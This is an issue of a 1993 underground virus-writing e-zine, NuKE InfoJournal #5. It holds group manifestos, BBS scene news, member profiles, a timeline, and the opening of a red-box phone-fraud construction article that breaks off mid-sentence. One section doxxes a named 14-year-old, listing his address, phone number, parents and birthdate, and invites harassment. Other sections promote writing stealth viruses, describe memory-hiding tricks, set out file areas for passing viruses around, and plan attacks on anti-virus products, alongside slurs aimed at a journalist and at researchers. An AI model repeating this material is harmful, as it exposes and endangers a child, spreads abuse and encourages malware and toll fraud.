===========================================================================
                       NuKE Info Journal #5                                
                       ~~~~~~~~~~~~~~~~~~~~                                
                          March 13, 1993                                   
                          ~~~~~~~~~~~~~~                                   
                                                                           
Article Topics.                                                            
~~~~~~~~~~~~~~                                                             
1. Halt! Who Goes There? (An Intro from Rock Steady)                       
2. State of 708 (An Intro from Nowhere Man)                                
3. NuKE Australia                                                          
4. NuKE TimeLine                                                           
5. DTMF Generator and Structural Design to Red & White Boxing
6. IBM 4700 Unix System, Why are these Bank System Popular?                
7. An Intro to Red Boxing                                                  
8. McAfee's ViruScan complete Virus signature listing
9. Viral Group? or Viral WareZ?                                            
10. V.C.L. v2.0 Update                                                     
11. Data Encryption Standard                                               
12. Disinfection on Fly, for your virus                                    
13. Infection on Closing for your virus                                    
14. Multipartite Viruses                                                   
15. Daemaen Virus                                                          
16. Sunday Telegraph Interview with Barbara Lewis                          
17. NuKE PoX v2.0 Sources                                                  
18. 1024 SBC Sources                                                       
19. Cyberculture                                                           
20. Truth on Gary Watson                                                   
21. Files Included in this Info Journal                                    
22. Credits and Site Listing                                               
===========================================================================
===========================================================================
Who Goes There? - A Fast Intro                                             
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~                                             
                                                                           
Greetings, my fellow cipher-associated phreaks, and welcome to a fifth     
issue of our "Informational Journal" by NuKE associates, otherwise         
expressed as our "InfoJournal" for short. It has been perhaps a long       
while since our last InfoJournal; many thought we died out, as we had      
calls from our local AV (AntiVirus) community to check it out. I blame     
the long length on re-structuring, being new here I forgot I had an        
InfoJournal to produce, and lastly to them k0ol guys that want to          
take our butts and lock us up and throw away the key. "We're back!!!"      
                                                                           
The new InfoJournal has undergone new structural changes, the biggest
being the bi-structural format: you can either execute the small           
5k Hypertext file to read this like in our previous releases, or you       
can take out your favourite editor and read the (NK-INFO5.TXT) directly.   
Nevertheless I do hope you will execute the small 5k Hypertext file as     
it contains features that are not in the data file, and it does a          
CRC-32 checksum check on the data file to make sure it has not been        
tampered with. Anyhow this may be the LAST InfoJournal in Hypertext format.
We may present a text-only file soon enough, as we intend to make the      
release dates a little more frequent; perhaps a monthly journal seems to   
be in our interests right now.                                             
                                                                           
New structural changes have been introduced into NuKE. I (Rock Steady)     
am perhaps the administrator of NuKE, as I play an active role in this     
dictating body, but nevertheless we also have other associates             
co-administrating NuKE with myself: Nowhere Man, Phrozen Doberman and      
Savage Beast are the other key-members, and we can not forget our latest   
additions, Screaming Radish and TäLöN.                                     
                                                                           
Our goal today is not a "perfect" group, nor do we wish to rule the        
scene, far from the truth. In a world that is so corrupt, we try to bring  
order and truth! The idea of creating "robots" to perhaps reach out        
and set an example that we cannot be stopped is amazing! Yes, we have      
created viruses beyond the scope of the narrow minded AV world -- in that  
we are in control, and if what we must do is discredit your software then
by-darn-it we will.                                                        
                                                                           
I hope to set an example with this organization we call "NuKE" -- we       
certainly DON'T think of NuKE as "just a" group. Normally a group is
localized, but in our case the most powerful members are scattered on      
three different continents! Certainly we are not here to assimilate        
anyone, we simply wish to co-join ideologies. We call ourselves
"anarchist." We suffer from injustice and repression brought upon us and   
every non-illiterate computer user by the AV world. With that we looked    
into our world, the sister world, the light of freedom in the dark night!  
Yes, we may be "underground" but our alienation gives us the upper hand    
over the AV world. We certainly know that our output perhaps will profit   
AVers and crush the small guys, but until the day comes that people        
understand that a piece of code is only code and not a biological hazard,  
our work is not done. All we wish to do is simply to bring out the
truth, nothing more, no conquering of the world, no destruction of         
computer networks, and certainly no one falling to our mercy for help. We  
give you what the butt-tight corporates hide from you. All we say is open  
your eyes, mature a little: Michelangelo will not cause every computer on  
the 6th day of March to die, rather it was more of a publicity stunt so    
that you will fill the AVers' pockets!                                     
                                                                           
One amazing case is if "Rock Steady" trades a virus with a buddy, this     
is OUTLAWED, and we are pointed out to be the "Evil Hackers," but, if
an AntiVirus person such as Frisk were to trade viruses with Joseph Greco, 
this is labelled as "the research of viruses." We, too, research our       
viruses, but we take an additional step forward -- we also research the    
AntiVirus products and label all of their flaws! But since we do that, the 
butt-tight corporate AntiVirus people label us as evil-doers. We are flesh 
just like yourselves.                                                      
                                                                           
     "Fame is really your WORST enemy." (Tormentor/DY)                     
                                                                           
Perhaps the smartest quote I've seen, taken from my bud Tormentor, of      
Demoralized Youth.                                                         
                                                                           
Nevertheless, I present to you this InfoJournal #5; apparently NuKE        
developed farther than ever expected! And we cannot mimic anyone as        
there is NO ONE to mimic. From here on NuKE is treading upon "unknown"     
territory, and you will see that in the articles presented here. The       
advances are "mind-boggling!" History is in the making!                    
                                                                           
                        Rock Steady/NuKE                                   
===========================================================================
===========================================================================
The State of 708                                                           
~~~~~~~~~~~~~~~~                                                           
                                                                           
Welcome to another exciting article detailing the triumphs and             
tribulations of everyone's favourite LATA, the 708/312 (Chicago) area.     
Since the last InfoJournal a few events have come up which deserve         
special attention, specifically the loss of two of the area's best boards, 
Ripco ][ and Nun-Beater's Anonymous, and changes at The Hell Pit. Read on  
for more details...                                                        
                                                                           
Ripco -- R.I.P.?                                                           
~~~~~~~~~~~~~~~~                                                           
Perhaps the most famous board in this area is the legendary Ripco ][,      
a text/message-oriented board run by Dr. Ripco. Ripco, in service since    
December 1983, is the area's, perhaps even the nation's, most established  
underground board, and draws hundreds of users from all over North America 
and had a huge collection of historic text files. However, Ripco is        
probably best known for its role in the Operation Sundevil crackdown of
1990, during which U.S. Secret Service agents broke into Dr. Ripco's       
apartment, detained him without cause, and seized all of his computer      
equipment, including the Ripco BBS. Due to complete lack of evidence, Dr.  
Ripco was set free, and Ripco went back up later that year with donated    
software and equipment. Now, in 1993, Ripco has suffered another blow.     
On January 21st, Dr. Ripco decided to change his hard disk controller;     
being a prudent man, he backed up all files first using FastBack Plus (this
was the fatal mistake). After reformatting his drives, the new controller  
failed to work properly. When he did a restore, however, he was in for a   
nasty surprise -- Fastback had failed him, and nearly all of his files were
unrecoverable. Luckily, the key system files and user logs were intact,    
but most of the file bases were gone forever.                              
Dr. Ripco requests that if you have any of his old files, that you         
re-upload them to Ripco ][ (the number is +1-312-528-5020) or mail them    
to him at his post office box (Bruce Esquibel, P.O. Box 18169, Chicago,    
Illinois 60618, USA). Dr. Ripco says he'll be happy to reimburse you for   
disks and postage. I encourage everyone to chip in and support Ripco in    
another time of need.                                                      
                                                                           
Then, on March 7, there was another shocking announcement at Ripco. The    
following are the highlights of the message that Dr. Ripco requested be    
passed on to the general public:                                           
                                                                           
                                                                           
"this is a bit difficult to do but it's got to be said.                    
                                                                           
technically the board isn't closing and going away forever but some major  
changes are going to take place shortly and for all practical reasons, it  
probably isn't going to exist as you now know it.                          
                                                                           
for about the last year, myself and several individuals on the system have
been toying with the idea of getting the system on internet. if you are not
familiar with internet, it's a world-wide network of computer systems which
basically makes a 100 line 6 gig private bbs look like a c-64 running off  
one floppy.                                                                
                                                                           
the problem however is public access to it. most of you that have used     
internet find out about that hard lesson sooner or later. chicago seems to 
be one of the few places in the area where public access is a challenge.   
                                                                           
i'd like to change that.                                                   
                                                                           
...to continue on with this project it has come to the point of dropping   
dos completely and switching the system over to UNIX completely. this means
the program and the bbs as you see it will be dumped.                      
                                                                           
not to keep your hopes up, what will be used to replace it will look like  
garbage initially. it'll be difficult to use and hard to figure out unless 
you have some prior UNIX experience.                                       
                                                                           
although i cannot be more specific on the new system at this time i do want
to say that ripco ][ will be put into a suspended state, in case everything
falls through and the project is abandoned, i promise to put things back to
the way it was.                                                            
                                                                           
so this isn't quite goodbye, just a vacation of sorts."                    
                        -- Dr. Ripco                                       
                                                                           
So it seems for now that Ripco ][ is gone, at least for a while. As of the 
release of this InfoJournal, Ripco is still up, although file access has
been removed. Let's hope for the best...
                                                                           
                                                                           
The Marty Zwikel Affair                                                    
~~~~~~~~~~~~~~~~~~~~~~~                                                    
In October 1992 a local loser named Repeat Offender (real name: Marty      
Zwikel) decided that, given the fact that he had managed to actually talk to
Rock Steady, he was a bona-fide NuKE member. Before anyone was able to
stop him, Marty decided to have a flame-war with Phalcon/SKISM over VX_NET.
Marty made false accusations toward Phalcon/SKISM (which I will not repeat 
here), then accused GarbageHeap and Count Zero of lying to him, and falsely
claimed that Rock Steady and myself supported his statements. He even had  
the audacity to add the NuKE signature after his name. Luckily cooler      
tempers prevailed, and everyone came to realize that he was just a local   
geek posing...he soon left the net, after complaints by all parties. For   
those of you who may be under the mistaken belief that "Repeat Offender"   
is in any way affiliated with NuKE (or ever was), THIS IS NOT TRUE. In     
actuality, Mr. Zwikel is a fourteen-year-old local fuck who tried to make  
the big leagues and made a fool of himself. Let's take a closer look at    
this asshole, shall we?                                                    
                                                                           
Marty Zwikel is a 14-year-old male (we think) who's currently a freshman   
at Buffalo Grove high school in Northwest suburban Chicago, where he has   
earned the nickname "Adolf." Why, you might ask? A few classmates of his   
chose this because "he's a stupid computer geek who has no friends and     
everyone hates him and we think he'll grow up to be crazy and so we call   
him Adolf," they say. A year or so ago he ran a board called "No Bitches   
Allowed" under another handle; luckily this immature punk was taught a     
lesson by an irritated user (who chooses to remain anonymous) and          
No Bitches Allowed was successfully taken down.                            
                                                                           
But Marty wouldn't learn. He brought his board back up as "The Altar,"     
a K-RaD 0 WaREZ board and assumed the handle "The All Powerful." Then      
he caught the H/P/V craze (as has most of 708, ugh) and changed his handle 
to "Repeat Offender," after a lame Richard Marx album. Then he publicly
announced on Nun-Beater's Anonymous that he was starting a "secret crashing
group" called Children of the Night, and immediately mailed me demanding   
to co-op with NuKE. When asked what his one-man group has actually done    
he said "I can't tell you which boards I've crashed because you might be   
friends with the sysops and get angry at me." (In other words, nothing.)   
Then came this incident over VX_NET. Now Marty has joined a local          
anti-Semitic crashing group which has been harassing and crashing boards   
all over the area. Will this kid ever learn?                               
                                                                           
Marty Zwikel lives at 3906 Mitchel Drive in Arlington Heights, Illinois    
with his father, Dean, and his mother, Susan. Perhaps you'd like to speak  
to him voice...you can reach him at +1-708-506-1980. As previously         
mentioned, Marty was born on July 28, 1978 and has blighted the world ever 
since. Perhaps some of you will find this information useful. I sure       
have...hehehe.                                                             
                                                                           
Nun-Beaters Goes Down                                                      
~~~~~~~~~~~~~~~~~~~~~                                                      
In early November 1992 Guido Sanchez, BLaH president and all-around wacky  
dude, took down Nun-Beaters Anonymous, his world-famous BBS, for           
undisclosed personal reasons. N.B.A., as it is known, was best known for   
its zany message bases, sysop access for first-time callers, and
complete and total lack of sysop control. In fact the sysop actually       
encouraged people to leech entire file bases at one time, disabling all    
file restrictions for all users and adding a special "/LEECH" command just 
for that purpose. According to Guido, N.B.A. should be back sometime soon, 
but, although it might have a software change, will maintain its
free-wheeling tradition. "It should be back up this summer," says Guido.   
"Actually, I don't know when it'll be back up, so whenever you're bored    
put it in the re-dial queue and you might get lucky. The number is         
+1-708-251-5094. Kick the habit, call N.B.A. today!"                       
                                                                           
As an interesting side-note, Nun-Beaters Anonymous was mentioned in        
Boardwatch Magazine (a print publication) for having an unusual name.      
"We don't even want to know," Boardwatch wrote.  The strange thing about   
this is that N.B.A. had been down for four months when this was published. 
                                                                           
                                                                           
Changes at Hell Pit                                                        
~~~~~~~~~~~~~~~~~~~                                                        
The Hell Pit, NuKE's only active Chicago site, and perhaps Chicago's only  
remaining quality BBS, has been undergoing some changes recently which     
deserve mention here. First of all, Kato, one of the system's two sysops,  
has gone away to university, leaving Hades as the board's only acting      
sysop. All messages concerning the system should be addressed to him,      
*not* to Kato. Kato logs in very rarely, and only has time to read normal  
private mail. Hell Pit has also purged the user list recently of the many  
users who don't call regularly, don't do anything but leech, etc. This is
in response to the growing scarcity of disk space (though there is talk
of a disk upgrade) and the tremendous in-use time of the system. FidoNet
was dropped due to lack of interest, so now Hades is in the process of
(finally!) adding NuKENET.                                                 
                                                                           
Again, contrary to rumour, Hell Pit is *NOT* a fed board. This rumour      
continues to resurface from time to time, but is just as untrue as ever.   
The Hell Pit is still active, too; some people have speculated that it's   
down, since the line is always busy. That's normal, folks -- Hell Pit      
is in use perhaps 85% of the time. So set your modem to wardial and call   
The Hell Pit at +1-708-459-7267 today!                                     
                                                                           
                        Nowhere Man/NuKE                                   
===========================================================================
===========================================================================
IJ #5 Comments by Phrozen Doberman, NuKE Australian Rep                    
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~                    
                                                                           
Intro                                                                      
~~~~~                                                                      
When most people think of Australia, they remember a famous Australian     
movie, _Crocodile Dundee_. Some instantly assume that we shave with        
six-inch knives and keep crocodiles as pets. Maybe the feds do, but not we 
at NuKE. Yes, we have defiantly joined the group of countries which are    
endlessly advancing in computer systems technology.                        
                                                                           
Before now, no-one had intended to put Australia on the map of countries   
where viruses are written. But time can not be separate from change, and   
changed we have. This year, three good .ASM coders from Australia joined   
NuKE in an effort to reach a common goal. Distance, race, religion and     
language put aside, they all put in their two-bits worth, so everyone could
benefit (Frisk/McAfee _NoT_).                                              
                                                                           
But the year has just begun, and it looks like it will be one that we won't
forget. 1992 was the year of development, the year of brainstorming and    
virus writing. 1993 is the time when we wrap our presents up, when the
emphasis changes from mass writing to organized virus implementation.      
                                                                           
Gone are the days of the passive virus. The virus that runs, infects and   
destroys. Frisk/Tbave have put an end to that. Now, it's _their_ turn. The
active virus is here to stay, and it shall stay as long as we can keep it. 
As virus writers, we all know our direction needs to change. The user is no
longer the ultimate target, now we are to aim at destroying every last     
piece of user confidence in Frisk/McAfee software.                         
                                                                           
NuKE's philosophy has changed over time, and like any philosophy, it should
be allowed to change. One must never under-estimate the power of experience
and thus we have come to the belief that:
                                                                           
         By attacking computer users, we gain nothing and anti-            
         virus vendors gain all, but by attacking anti-virus               
         products, we not only inundate the anti-virus companies           
         with more work, but destroy the users' confidence in their
         programs.                                                         
                                                                           
This is the philosophy that will put the fear into every anti-virus vendor,
and now it is they who will have to face this reality. We realize what     
Frisk/McAfee _want_ us to do, to continue doing what we have in the past,  
but we know better than that. If there is one thing I would like to teach  
McAfee/Frisk it would be to show them that they aren't dealing with any    
bunch of smart kiddies, because now we will become as organized as them.   
                                                                           
One could consider such a result of this philosophy. For every user who    
loses confidence in Frisk/McAfee and returns to NAV/CPAV, we are giving our
future viruses a much better chance of survival. Frisk/McAfee deal the     
cards, they _have_ the support of the IBM PD world. NAV/CPAV receive the   
cards, thus they lack in keeping updated. This is what we need to exploit. 
                                                                           
I'm not going to sit here and make statements that I don't believe in. Nor 
could I be bothered using this introduction as some egotistical experience.
I am here to tell you, the follower, onlooker, or participant of NuKE,
that we are not just any underground group.                                
                                                                           
I admit, I can't write a virus for shit. In fact, my role in NuKE has      
nothing to do with viruses. My best contribution to NuKE is in its
management. I can only tell you using the knowledge that I have learnt over
time, that no matter how good your programmers are, no matter how good     
your tutorials are, no matter how good you can hack or crack               
F-prot/McAfee, it will be wasted if it's not implemented properly.         
                                                                           
I only want one thing from NuKE. I want to see the group reach its full    
potential. If I can help make the basis of NuKE a platform more suitable
for other experienced programmers to use, then that is what I aim to do.   
This is the year where NuKE will be reforming many of its practices. You   
are not just observing a group of highly skilled programmers, going about  
their work, but a group with a highly organized structure.                 
                                                                           
Organization is the way NuKE will survive. It is how we can stop the       
Frisk/McAfee team beating us. It can help us in every way, shape and form, 
with beta-testing, virus distribution, info distribution, nukenet          
management, and most importantly, a single combined push for the active    
anti-Frisk/anti-McAfee virus code.                                         
                                                                           
This is not the time or place to start talking about NuKE-Net organization 
in depth. NuKE-CoNF will deal with that. What is NuKE-CoNF? In short, it is
going to be a detailed system analysis of NuKE, so we can optimize our     
procedures, and not just make them into efficient ones, but the best.      
                                                                           
Anyone can contribute to NuKE-Conf, so long as you are a NuKE member or    
associate. VX/P-S associates may also contribute ideas. All submissions    
will be worked over, compared with other submissions, and modified if
necessary.                                                                 
                                                                           
Unfortunately, NuKE can not guarantee that results of NuKE Conf will be
published.                                                                 
                                                                           
Before I continue, I make one pledge to all those reading this. If we, as  
virus writers, want to achieve our goals, then we need to work together. We
need to understand our weaknesses and our strengths, and improve our       
systems where possible, for any group which can do this does not just      
exist as a magnetic particle on a hard disk somewhere on someone's computer
but continues to succeed with the spirit of every participating member, the
spirit of NuKE.                                                            
                                                                           
        Thank You.                                                         
                                                                           
        Phrozen Doberman                                                   
        Melbourne, Australia                                               
        22nd February, 1993                                                
                                                                           
                                                                           
New Info                                                                   
~~~~~~~~                                                                   
I am now beta-testing a Tic File Distribution link between myself and      
Screaming Radish. It seems to be working fine, and if implemented, all     
members will benefit. First, however, let me explain what "TiC" is all     
about.

"TiC" or TDF (Tick File Distribution), as we will refer to it, is a way in
which NuKENET BBS's can transfer files between each other in a very simple
and automatic way. "TiC" will attach a hatched file (that is, a file you
intend *everyone* to have, ie: InfoJournals) to your Front Door,
D'Bridge or similar Fido-standard-compatible mail handler. A quick
example: Rock Steady wants to release a new virus, but he wants to make
sure everyone gets it. He places a .ZIPped copy of the virus's kernel in a
special area where his "TiC" processor (ie: FileMgr) will identify this
virus as a new file to be hatched.
                                                                           
His "TiC" processor then determines what systems are in the export list,   
and attaches this file (as a netmail file attach) to each node in the      
export list, along with a file with an extension ending in .TIC. Inside    
this .TIC file is the file area's name, a description and seen-by's.
                                                                           
                I suggest that the following areas are set up:             
                                                                           
        VIRUS_BETA      =       Internal beta-testing viruses.             
                                Never to be released.                      
                                Only for members.                          
                                All bugs reports via NuKENET.              
                                                                           
        VIRUS_FINAL     =       Final kernels of viruses.                  
                                _MUST_ have been beta-tested.              
                                Not for release to the general             
                                public.                                    
                                                                           
        VIRUS_INFECT    =       Infected programs with the virus           
                                so we may under "beta-testers."            
                                                                           
        VIRUS_SOURCE    =       All virus source.                          
                                                                           
        VIRUS_EXTRA     =       Odd things. Including IJ's.                
                                                                           
                All comments, via NuKENET please.

New Memberz                                                                
~~~~~~~~~~~                                                                
        I'd like to announce the following new NuKE members:               
                                                                           
                Screaming Radish - NuKE Aust. Vice Rep                     
                Shindaq Arl'hur  - Member                                  
                The Wierd One    - Member                                  
                TäLöN            - Member                                  
                                                                           
Left Memberz                                                               
~~~~~~~~~~~~                                                               
I'd like to announce the following memberz have left:                      
                                                                           
                    Lord Venom and Screaming Jesus                         
                                                                           
            The Pit BBS is *NO LONGER* a NuKE support BBS.                 
                                                                           
Memberz Analysis                                                           
~~~~~~~~~~~~~~~~                                                           
Although there existed a stage where I was the only NuKE Australian member,
the festive season has brought many a virus writer out of the closet. The  
three new members, S.R., Shindaq and TäLöN, all have previous experience   
with writing viruses.                                                      
                                                                           
Screaming Radish: is extremely skilled in stealth and memory               
~~~~~~~~~~~~~~~~  addressing techniques; saying such a statement is like
saying E=MC² was an okay formula. SR is MC², SR has abilities never
dreamed about. You have a problem? SR will get you a solution! We hated that
memory loss in TSR Viruses, so SR got us a routine to steal buffers from
DOS, and used those for allocating a virus! As DOS buffers are about 512
bytes each, stealing 3-4 will result in no harm to the system and NO MEMORY
CHANGE AT ALL! Amazing! And we laughed at Proto-T? And the list goes on... 
                                                                           
Shindaq: Has been disabling viruses for a few years, and specializes       
~~~~~~~  in dropper-type viruses. He has also written a dropper-type virus 
from scratch.                                                              
                                                                           
TäLöN: Has been a virus writer for years, here's his background, in his    
~~~~~  own words:                                                          
                                                                           
"Hi there, I am typing to you from Newcastle, New South Wales,
Australia. I am not new to the virus scene, in fact I was a member of the  
puppet group [PuKE].                                                       
                                                                           
Just a quick background on PuKE: it was set up about a year ago by Harry   
McBungus (who wrote X-Fungus, No Frills 2.0 and No Frills 3.0, all         
unremarkable) simply as a stuff-around, paying out on NuKE. Harry saw NuKE 
getting large egos over large, non-resident direct-action viruses: in other
words he thought they were idiots. Hence, PuKE endeavoured to write things
which compared to NuKE WareZ but on a far smaller code scale. The fruits of
Harry's labours were 'stolen' by myself, however, and that is how they grew
in the wild; otherwise they would not be around.                           
Although PuKE disliked NuKE, everything grows in stages, people mature, and
since then NuKE has evolved into the best Power Virus Group in the world.  
                                                                           
(As a side note, Harry left the scene in around June 1992, as a result of  
something called a Fraud squad. Good luck to Harry in whatever he is now   
doing.)                                                                    
                                                                           
I, TäLöN, defected to NuKE shortly after writing the Dudly virus (also     
known as No Frills 4.0 and V2P6Z Mark 2, which was stolen off me by        
someone hacking into my board. I had no intention of releasing it into the 
wild. It's unremarkable besides its lame polymorphism, which is similar to 
V2P6 in end result, not generation)                                        
                                                                           
I have not added anything to the virus scene since the writing of Dudley-1,
but grew active a month ago with the creation of another, yet-to-be-named  
virus, namely a 3k COM/EXE/SYS/BIN/OVL/MBR/BS infecting, polymorphic       
stealth virus. It hides partition infection; it hides file size increase on
directory; it infects boot sectors of ANY floppy format, current or future,
on read/write access; it infects hard disk partition on infected disk boot 
or infected file execution on virgin system, and so on. One mother of a    
virus.                                                                     
                                                                           
However, I have taken great care not to make it destructive in any way, so
no stupid AV researcher can point the finger and spin the typical anti-virus
rhetoric, 'Bad virus, bad virus, didn't you know every virus will destroy  
precious hours of work.'                                                   
                                                                           
My opinion of AV researchers in general is very low. I take great pride in
totally debunking their theories and stereotypes. I am NOT a social        
recluse. I do not have a sunken chest, nor am I fat or a cowardly          
insignificance. I possess a fair degree of common sense. I do not go out of
my way to trash boards or computers; in fact I steer away from such things.
Furthermore, I do not view virus writing or the discussion of viruses as a
taboo subject.                                                             
                                                                           
Most of all I do not try to keep the public in the dark about what viruses 
can and cannot do. Harry McBungus shared basically the same views but when 
he tried to speak out and 'educate' the public, he instead got nailed by   
the press. (The media is another of my pet hates.)                         
                                                                           
Anyway I have lost patience with hierarchy and bureaucracy... and the      
media, the government and the public can basically suck John McAfee's dick 
while he laughs all the way to the bank. We have provided an income for
John for long enough, it's time to make SCAN look like the total crock of  
shit that it has always been.                                              
                                                                           
Before I leave, just a few quick hi's, ho's and 'thanks' to:               
John McAfee: Fuck You                                                      
Patricia 'It is unknown what this virus does besides replicate' Hoffman:   
        How about you get a clue before you make out you're the big-wig    
        virus analyzer. VSUM is the biggest farce since ViruScan itself.   
Sara Gordon: for all the laughs your ridiculous psychological theories     
        about virus writers gave me. Try a bit harder.                     
Matt: for all the cool times we had. The legend of the 50-cent piss-up     
        will never leave my memory banks.                                  
Pantera, Metallica: for providing an awesome soundtrack for virus          
        development!                                                       
and to NuKE for making everything possible.                                
                                                                           
                        TäLöN/NuKE"                                        
                                                                           
All in all, you will be seeing a lot more from NuKE Australia this year. We
have refocused on the job, have a brand-new line up (new blood rarely does 
harm) and we have a direct vision for the future. All of this would be hard
to achieve without the coherence, unity and strength of NuKE!
                                                                           
Final Note                                                                 
~~~~~~~~~~                                                                 
Here is where you all get your compliments! A big thanks to Rock Steady,   
for keeping the NET alive. Overall, he has managed NuKENET in the best way 
possible, and this does deserve some positive feedback. I would also like  
to thank him for all the charges he has incurred while keeping the NuKENET 
link alive! Yes, NuKENET pays for its calls. No illegal crap in our camp!  
                                                                           
Secondly, I would like to thank Nowhere Man for supplying us with          
beta versions of NED, Screaming Radish for helping me when I needed        
suggestions and technical advice, Shindaq for keeping the BBS alive, TäLöN 
for helping out and keeping your cool, and last but not least, Savage      
Beast for keeping an excellent database of viruses.                        
                                                                           
         Hubbada, Hubbada, and good virus writing to you all....           
                                                                           
Please address all correspondence to: Phrozen Doberman, 111:950/3@Nuke_NET
                                                                           
                        Phrozen Doberman/NuKE                              
===========================================================================
===========================================================================
A NuKE Timeline                                                            
~~~~~~~~~~~~~~~                                                            
-------------------------------------------------------------------------- 
October 1992                                                               
NED (NuKE Encryption Device) is completed, an encryption engine that is    
very simple to use, yet overcomes all of the "flaws" of MtE to become      
perhaps the wildest engine out, with an ability to understand code and     
compile its very own code. Amazing. VCL v2.0 will "field test" the success 
of this NuKE product by Nowhere Man.                                       
-------------------------------------------------------------------------- 
November 1992                                                              
NuKE-PoX Virus version 2.0 noted as a common North-American virus in VSUM. 
-------------------------------------------------------------------------- 
November 1992                                                              
NuKENET joins with VX_NET from ARiSToLE's board.                           
-------------------------------------------------------------------------- 
November 1992                                                              
NuKENET is extended not only to Australia, but, with the help of Savage    
Beast, is also expanded to Europe. Demoralized Youth of Sweden gets on     
NuKENet, along with other supporting countries like the Netherlands,       
Switzerland, and Bulgaria.                                                 
-------------------------------------------------------------------------- 
November 1992                                                              
NuKE encounters "Death Angel" of Toronto, the virus programmer of the      
original ONTARIO-512 and ONTARIO-1024 (aka 1024-SBC). Death Angel made     
himself a NuKE supporter. In our InfoJournal #3 we disassembled the
Ontario-512 virus, and as a result the Ontario-730 was derived from it     
(which was NOT programmed by Death Angel!). Both viruses got listed as     
common viruses in North America! Death Angel also gave us his original     
source of Ontario-512 and -1024 (which we include in this issue).
-------------------------------------------------------------------------- 
December 1992                                                              
Screaming Radish joins up with the NuKE Team. His abilities with the 80x86
are mind-boggling and he is known for the best all-nighters that I've ever
seen... Even though relations with Screaming Radish go "WAY-BACK" (he was
considered part of us for a while), only NOW did Screaming Radish
officially join NuKE by completing his "test-of-NuKEhood" in the
Australian outback, and as a proven hacker he succeeded in hiding his
tracks and killing the Bushmen and crocodiles on his tail...<hehe> [What
can I say, it's tough to become an Aussie-NuKEer! :-)]
-------------------------------------------------------------------------- 
January 10th, 1993                                                         
TäLöN: enough respect goes out to this charm... He too has succeeded in the
wild-bush hunt of the Aussie, though he was never the same afterward...    
<hehe> Just as Compton was put on the map by the Brothers, TäLöN is the    
one to put Aussie onto the map. For that I gave him a whole paragraph      
in this intro...                                                           
-------------------------------------------------------------------------- 
January 10th, 1993                                                         
Paul Ferguson thinks he's an amazing god with connections (for the local   
strawberry club) since he knows how to use Directory Assistance and called 
NuKE up! Big-ol' Pauly cried on our shoulders that [and we quote]          
     "ITS A POLYMORPHIC WAR OUT THERE! (sob, cough, snort)"                
Huh? Paul got a copy of TPE. (Yeah right! He heard of it and wanted to know
if we had it!). All in all Paul showed himself to be a powerful man, with  
very powerful friends, and was able to prove that he was THE god being     
able to crush us with a snap of his fingers. For this NuKE awarded Paul    
with the NuKE Wanker of the Year award. It's the FIRST time NuKE presented 
such an award, so we named it after Paul, therefore with respect we now    
call it...                                                                 
   "The NuKE Big-Ol' Paul Ferguson Wanker Award"                           
We were going to send him a picture of a horse's ass and sign it, but we   
figured a mirror will pretty much be the same, but cheaper...
-------------------------------------------------------------------------- 
January 24th, 1993                                                         
Daemaen Virus created by TäLöN. This virus will infect ANYTHING that       
moves. It will infect .EXEs, COMs, OV?s, SYSs, BINs, floppy boot sectors,  
and HD partition tables. It also contains a dir-stealth routine, and will  
infect files on open, creation, close, browsing, attribute functions, you  
name it... A very fast, extremely fast infector. Its features will be      
embedded inside VCL v2.0, coming soon in a computer near you...            
-------------------------------------------------------------------------- 
February 1993                                                              
The Weird One and Shindaq Arl'hur have joined the NuKE team. Their         
abilities are also well spoken of, being amazing guys and an asset to the  
Team. (Though it'd be cooler if they talked a little more...<Hehe>) Hiya'
Guys!                                                                      
-------------------------------------------------------------------------- 
February 1993                                                              
The Dark Elf Virus, by Shindaq Arl'hur, comes alive. It is another         
multipartite virus that infects boot sectors and HD Partition as well as   
.EXE and .COM files. With stealth boot abilities it too will have its      
features embedded inside VCL v2.0.                                         
-------------------------------------------------------------------------- 
February 2nd, 1993                                                         
Rock Steady goes to the local post office and mails two letters to two NuKE
members who will remain unknown (Phrozen Doberman and TäLöN) and yet where
did the letters end up? [Thanks for telling me you got 'em! NOT!]          
-------------------------------------------------------------------------- 
February 8th, 1993                                                         
ARCV of England gets busted BIG-TIME. Apache Warrior and his followers are 
charged with computer fraud for the purpose of causing damage with         
self-replicating code (viruses). England flips, and the nation of n0-Crimez
wonders how to control this loop in the hole. An "example" is supposed to  
be made of the group to scare others from repeating their actions!         
-------------------------------------------------------------------------- 
February 15th, 1993                                                        
Barbara Lewis from the English newspaper _Sunday Telegraph_ calls up
NuKE for a one-on-one interview.  The bitch got nothing, as we've already  
visited Compton. But she pulled a strawberry act on us -- yup, she gave us 
her number, and now NuKE and Barbara got a hot "soap-opera" relation going!
Our favourite "girlfriend-boyfriend" saying is "Bitch, get off my wanker!" 
-------------------------------------------------------------------------- 
March 1st, 1993                                                            
Rock Steady had a vision of releasing the NuKE InfoJournal today, but      
federal officers thought otherwise... [BiTE Me]                            
-------------------------------------------------------------------------- 
March 12th, 1993                                                           
After visiting Compton, Rock Steady had the sudden urge to rap out the     
words to the song "Fuck Tha Police" by NWA while entering the station with 
a logo "Blow away the pigs" embedded on his t-shirt, visiting his parole   
officer...                                                                 
-------------------------------------------------------------------------- 
===========================================================================
===========================================================================
DTMF Generators, White Boxing, and Red Boxing                              
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~                              
                                                                           
I've seen before me way too many fabrications of red boxes; the H/P        
community enjoys talking about it a lot, and fantasizing about its
abilities. But seldom do I see an accurate example of any box
construction. Perhaps I'm simply in the wrong circle? Nevertheless I did a
little research on the actual structure of a DTMF Generator and on how to
convert this into
a red and white Box. 2600 Enterprises did have the BEST red box example to 
pass before me, however in Canada legislation differs quite a lot, and     
any kit or package that can be hacked is not tolerated; so therefore the   
famous Radio-Shack Pocket Dialer is not available here, and I would say    
many other places, such as Europe or Australia, where Radio Shack is not   
as widely established as in the USA. Our Radio Shacks are no bigger than a 
local corner candy store, and the only useful products they sell are       
calculators. Pathetic is the scene I run into everywhere I go in lovely    
Canada. So since the Radio-Shack Pocket Dialer WITH MEMORY is not available
I guess we must build the actual device from scratch. It's fairly simple,  
and I've already succeeded in building the DTMF Generator. It's very       
easy -- it consists of one IC, a crystal to control the oscillator (in     
the IC) and a key-pad.                                                     
                                                                           
The construction of the DTMF Tone Generator is perhaps the hardest part of 
this project, and yet that is fairly simple. Anyhow this project does
require you to know the basics of kit building, and hopefully you know how 
to use a soldering iron, as you will need to solder the IC and Crystal onto
a simple board. Now the DTMF tones are generated internally inside the IC, 
